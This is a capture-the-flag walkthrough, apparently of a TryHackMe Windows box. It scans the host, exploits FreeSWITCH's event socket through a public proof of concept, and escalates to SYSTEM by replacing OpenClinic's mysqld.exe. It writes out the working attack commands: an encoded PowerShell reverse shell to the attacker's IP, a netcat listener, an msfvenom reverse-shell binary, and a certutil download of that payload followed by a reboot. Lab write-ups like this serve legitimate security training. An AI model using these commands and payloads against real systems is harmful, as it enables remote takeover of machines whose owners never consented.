0x00 Recon we will first use rustscan to perform a port scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 rustscan -a 10.10.251.223 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-' `-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Nmap? More like slowmap.🐢 [~] The config file is expected to be at "/home/kali/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan' s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000' . Open 10.10.251.223:3389 Open 10.10.251.223:8021
then use nmap for more detailed scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 sudo nmap -Pn -sC -sV -A -O 10.10.251.223 -p 3398,8021 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 10:06 EDT Nmap scan report for 10.10.251.223 Host is up (0.33s latency). PORT STATE SERVICE VERSION 3398/tcp filtered sapcomm 8021/tcp open freeswitch-event FreeSWITCH mod_event_socket Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type : specialized|general purpose Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops
FreeSWITCH appears to be suspicioushttps://www.exploit-db.com/exploits/47799
0x01 RCE we can use this Proof of Concept (PoC) to gain shell
1 2 3 4 5 6 7 └─$ python poc.py 10.10.251.223 "whoami" Authenticated Content-Type: api/response Content-Length: 25 win-eom4pk0578n\nekrotic
Afterwards, we can use revshells.com to generate a reverse shell script.https://www.revshells.com/
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 python poc.py 10.10.251.223 "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADkAMgAuADEANQAwACIALAA3ADcANwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" Authenticated └─$ rlwrap nc -nvlp 7777 listening on [any] 7777 ... connect to [10.8.92.150] from (UNKNOWN) [10.10.251.223] 49873 dir Directory: C:\Program Files\FreeSWITCH Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 09/11/2021 07:22 cert d----- 09/11/2021 07:22 conf d----- 24/06/2023 14:55 db d----- 09/11/2021 07:18 fonts d----- 09/11/2021 07:18 grammar d----- 09/11/2021 07:18 htdocs d----- 09/11/2021 07:18 images d----- 09/11/2021 07:18 libmariadb_plugin d----- 24/06/2023 14:55 log d----- 09/11/2021 07:18 mod d----- 09/11/2021 07:22 recordings d----- 09/11/2021 07:22 run d----- 09/11/2021 07:22 scripts d----- 09/11/2021 07:18 sounds d----- 09/11/2021 07:22 storage -a---- 20/08/2019 13:08 4991488 FreeSwitch.dll -a---- 20/08/2019 13:08 26624 FreeSwitchConsole.exe -a---- 20/08/2019 13:19 62976 fs_cli.exe -a---- 13/05/2019 07:13 293888 ks.dll -a---- 20/08/2019 13:04 152064 libapr.dll -a---- 20/08/2019 13:04 134656 libaprutil.dll -a---- 20/08/2019 13:16 131584 libbroadvoice.dll -a---- 21/03/2018 20:39 1805824 libeay32.dll -a---- 23/03/2019 16:37 1050112 libmariadb.dll -a---- 20/08/2019 13:06 190464 libpng16.dll -a---- 05/04/2018 10:18 279552 libpq.dll -a---- 04/04/2018 18:59 1288192 libsndfile-1.dll -a---- 20/08/2019 13:05 1291776 libspandsp.dll -a---- 20/08/2019 13:04 27648 libteletone.dll -a---- 09/08/2018 12:42 283648 lua53.dll -a---- 09/04/2018 13:36 66362368 opencv_world341.dll -a---- 09/11/2021 07:18 825160 openh264.dll -a---- 20/08/2019 13:02 4596 OPENH264_BINARY_LICENSE.txt -a---- 03/04/2018 18:31 147456 pcre.dll -a---- 20/08/2019 13:14 313856 pocketsphinx.dll -a---- 20/08/2019 13:10 49152 pthread.dll -a---- 13/05/2019 08:03 165888 signalwire_client.dll -a---- 20/08/2019 13:14 366592 sphinxbase.dll -a---- 21/03/2018 20:39 349184 ssleay32.dll -a---- 24/03/2018 20:20 15766528 v8.dll -a---- 24/03/2018 20:05 177152 v8_libbase.dll -a---- 24/03/2018 20:19 134656 v8_libplatform.dll -a---- 03/04/2018 15:01 126976 zlib.dll PS C:\Program Files\FreeSWITCH>
We can find two flags in C:\Users\Nekrotic\Desktop.
1 2 3 4 5 6 7 8 9 10 PS C:\Users\Nekrotic\Desktop> ls Directory: C:\Users\Nekrotic\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 09 /11 /2021 07 :39 38 root.txt -a---- 09 /11 /2021 07 :39 38 user.txt
however, reading root.txt requires NT AUTHORITY\SYSTEM privileges.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 PS C:\Users\Nekrotic\Desktop> Get-Acl root.txt | select *PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop\root.txt PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop PSChildName : root.txt PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem CentralAccessPolicyId : CentralAccessPolicyName : Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Nekrotic\Desktop\root.txt Owner : NT AUTHORITY\SYSTEM Group : WIN-EOM4PK0578N \NoneAccess : {System.Security.AccessControl.FileSystemAccessRule} Sddl : O:SYG:S-1-5-21-343416598-1122472384-1008025730-513D :PAI(A;;FA;;;SY) AccessToString : NT AUTHORITY\SYSTEM Allow FullControl AuditToString : AccessRightType : System.Security.AccessControl.FileSystemRights AccessRuleType : System.Security.AccessControl.FileSystemAccessRule AuditRuleType : System.Security.AccessControl.FileSystemAuditRule AreAccessRulesProtected : True AreAuditRulesProtected : False AreAccessRulesCanonical : True AreAuditRulesCanonical : True
0x02 Privilege Escalation When we couldn’t find a solution while searching everywhere, we discovered the “projects” folder.
1 2 3 4 5 6 7 8 9 PS C:\projects> ls Directory: C:\projects Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 09 /11 /2021 07 :29 openclinic
Within that folder, “openclinic” appears to be somewhat suspicious.https://www.exploit-db.com/exploits/50448
let’s first confirm what actions we can perform on mysqld.exe.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 PS C:\projects> Get-Acl C:\projects\openclinic\mariadb\bin\mysqld.exe | select *PSPath : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin\mysqld.exe PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin PSChildName : mysqld.exe PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem CentralAccessPolicyId : CentralAccessPolicyName : Path : Microsoft.PowerShell.Core\FileSystem::C:\projects\openclinic\mariadb\bin\mysqld.exe Owner : BUILTIN\Administrators Group : WIN-EOM4PK0578N \NoneAccess : {System.Security.AccessControl.FileSystemAccessRule, System.Security.AccessControl.FileSystemAccessRule, System.Security.AccessControl.FileSystemAccessRule} Sddl : O:BAG:S-1-5-21-343416598-1122472384-1008025730-513D :AI(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0 x120 0 a9;;;BU) AccessToString : NT AUTHORITY\SYSTEM Allow FullControl BUILTIN\Administrators Allow FullControl BUILTIN\Users Allow ReadAndExecute, Synchronize AuditToString : AccessRightType : System.Security.AccessControl.FileSystemRights AccessRuleType : System.Security.AccessControl.FileSystemAccessRule AuditRuleType : System.Security.AccessControl.FileSystemAuditRule AreAccessRulesProtected : False AreAuditRulesProtected : False AreAccessRulesCanonical : True AreAuditRulesCanonical : True
It seems that we can replace mysqld.exe with a fake one to obtain a reverse shell
1 2 3 4 5 6 msfvenom -p windows/shell_reverse_tcp LHOST=10.8.92.150 LPORT=2222 -f exe -o mysqld.exe python3 -m http.server 80 rlwrap nc -nvlp 2222 listening on [any] 2222 ...
After replacing mysqld.exe, we can proceed to restart the system.
1 2 3 4 5 Rename-Item -Path "C:\projects\openclinic\mariadb\bin\mysqld.exe" -NewName "mysqld2.exe" certutil.exe -urlcache -f http://10.8 .92.150 /mysqld.exe mysqld.exe Restart-Computer
nice~ we got nt authority\system now we can read root.txt hehe~
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 rlwrap nc -nvlp 2222 listening on [any] 2222 ... connect to [10.8.92.150] from (UNKNOWN) [10.10.154.60] 49670 Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Users\Nekrotic\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 84FD-2CC9 Directory of C:\Users\Nekrotic\Desktop 09/11/2021 08:39 <DIR> . 09/11/2021 08:39 <DIR> .. 09/11/2021 08:39 38 root.txt 09/11/2021 08:39 38 user.txt 2 File(s) 76 bytes 2 Dir(s) 50,272,202,752 bytes free C:\Users\Nekrotic\Desktop>type root.txt type root.txt type root.txtTHM{}
